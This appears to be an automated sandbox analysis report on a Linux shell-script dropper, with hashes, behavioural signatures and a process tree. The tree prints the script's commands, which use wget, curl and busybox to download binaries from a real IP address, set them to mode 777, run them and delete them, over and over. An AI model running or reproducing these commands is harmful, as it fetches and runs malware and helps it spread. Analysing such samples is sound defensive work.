Analysis
-
max time kernel
52s -
max time network
57s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
14-11-2024 02:50
Static task
static1
Behavioral task
behavioral1
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
-
Size
10KB
-
MD5
aae1d5abee7934f0e4222cffef0b2329
-
SHA1
068230ae72391a90d17b4f8c26d9665b3c7971be
-
SHA256
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d
-
SHA512
1e9c830304e2aded2bd79e88b10a4af93cc50ac5e1b627a042727a17d92546e521a2d20b99af77a18a60d8cef82498eb9295bc3d340fc76b38930b6e5356fc2b
-
SSDEEP
192:qovj7zA0N1Bx6yhxSWD8M8FBSSGgAap+mX4DGgAap+mXmDV8M8FBSHFj7zA031Bg:qovj7zA0VxV5SWZDWVDzlj7zA0c
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 824 chmod 838 chmod 875 chmod 681 chmod 699 chmod 744 chmod 792 chmod 804 chmod 887 chmod 810 chmod 849 chmod 855 chmod 727 chmod 766 chmod 798 chmod 867 chmod 786 chmod 818 chmod 830 chmod 861 chmod 881 chmod -
Executes dropped EXE 21 IoCs
Processes:
zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxpY0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsAYBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLofkwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJpooPG8wQROD6wksRWAfxchOtNyCZDfqXH71vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzkuX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2CmARkfCaTjArNVROyobHsVYM6en6J2bTk7iQcmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUYARkfCaTjArNVROyobHsVYM6en6J2bTk7iQcmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzkuX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2CmY0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxKioc pid Process /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE 682 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp 701 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK 729 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 745 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 /tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA 767 O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA /tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof 787 YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ 793 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 799 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m 805 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY 811 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk 819 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm 825 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ 831 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr 839 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m 850 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY 856 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ 862 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr 868 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk 876 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm 882 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK 888 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK -
Checks CPU configuration 1 TTPs 21 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY curl File opened for modification /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE curl File opened for modification /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp curl File opened for modification /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY curl File opened for modification /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ curl File opened for modification /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m curl File opened for modification /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ curl File opened for modification /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m curl File opened for modification /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk curl File opened for modification /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm curl File opened for modification /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ curl File opened for modification /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk curl File opened for modification /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm curl File opened for modification /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK curl File opened for modification /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK curl File opened for modification /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 curl File opened for modification /tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA curl File opened for modification /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr curl File opened for modification /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr curl File opened for modification /tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof curl File opened for modification /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 curl
Processes
-
/tmp/9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh/tmp/9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh1⤵PID:648
-
/bin/rm/bin/rm bins.sh2⤵PID:650
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:653
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:670
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:677
-
-
/bin/chmodchmod 777 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- File and Directory Permissions Modification
PID:681
-
-
/tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE./zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Executes dropped EXE
PID:682
-
-
/bin/rmrm zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:683
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:684
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:685
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:693
-
-
/bin/chmodchmod 777 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- File and Directory Permissions Modification
PID:699
-
-
/tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp./5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Executes dropped EXE
PID:701
-
-
/bin/rmrm 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:702
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:703
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:711
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:719
-
-
/bin/chmodchmod 777 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK./Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Executes dropped EXE
PID:729
-
-
/bin/rmrm Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:731
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:733
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:743
-
-
/bin/chmodchmod 777 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8./8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:746
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:747
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:759
-
-
/bin/chmodchmod 777 O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA./O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:768
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:769
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:785
-
-
/bin/chmodchmod 777 YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof./YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Executes dropped EXE
PID:787
-
-
/bin/rmrm YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:788
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:789
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:791
-
-
/bin/chmodchmod 777 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ./kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:794
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:795
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:797
-
-
/bin/chmodchmod 777 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7./pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:800
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:801
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:803
-
-
/bin/chmodchmod 777 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m./1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:806
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:807
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:809
-
-
/bin/chmodchmod 777 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY./7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:812
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:813
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:815
-
-
/bin/chmodchmod 777 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk./1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:820
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:821
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:823
-
-
/bin/chmodchmod 777 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm./uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:826
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:827
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:829
-
-
/bin/chmodchmod 777 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ./ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Executes dropped EXE
PID:831
-
-
/bin/rmrm ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:832
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:833
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:837
-
-
/bin/chmodchmod 777 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr./cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:840
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:841
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:846
-
-
/bin/chmodchmod 777 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m./1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:851
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:852
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:854
-
-
/bin/chmodchmod 777 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY./7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:857
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:858
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:860
-
-
/bin/chmodchmod 777 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ./ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:863
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:864
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:866
-
-
/bin/chmodchmod 777 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr./cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:869
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:870
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:872
-
-
/bin/chmodchmod 777 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- File and Directory Permissions Modification
PID:875
-
-
